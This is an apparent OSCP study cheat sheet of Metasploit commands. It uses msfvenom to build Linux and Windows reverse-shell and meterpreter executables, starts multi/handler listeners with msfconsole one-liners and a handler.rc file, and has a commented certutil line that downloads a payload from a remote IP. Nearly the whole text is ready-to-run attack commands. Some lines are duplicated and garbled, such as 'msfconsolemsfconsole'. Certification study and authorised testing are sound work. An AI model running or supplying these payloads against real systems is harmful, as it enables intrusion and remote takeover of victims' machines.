msfvenom
Meterpreter linux - for OSCP
shell.elf
msfconsolemsfconsole -q -x "use multi/handler; set payload linux/x64/shell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"
Meterpreter windows - for OSCP
shell.exe
#echo $IP_LOCAL
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-4444-powershell.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-4444-cmd.exe
# certutil -urlcache -f http://192.168.45.238/shell-4445-powershell.exe shell-4445-powershell.exe
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"
msfconsole -q -x "use multi/handler; set payload windows/x64/shell/reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"
Meterpreter linux - not❗ for OSCP
shell.elf
msfconsolemsfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LOCAL; set lport 4444; exploit"
Meterpreter windows - not❗ for OSCP
shell.exe
echo $LOCAL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LOCAL LPORT=4444 -f exe > shell-4444-meterpreter.exe
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost $LOCAL; set lport 4444; exploit"
Meterpreter start from file
create handler.rc file
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.18.9.175
set LPORT 4444
run
Links
- https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/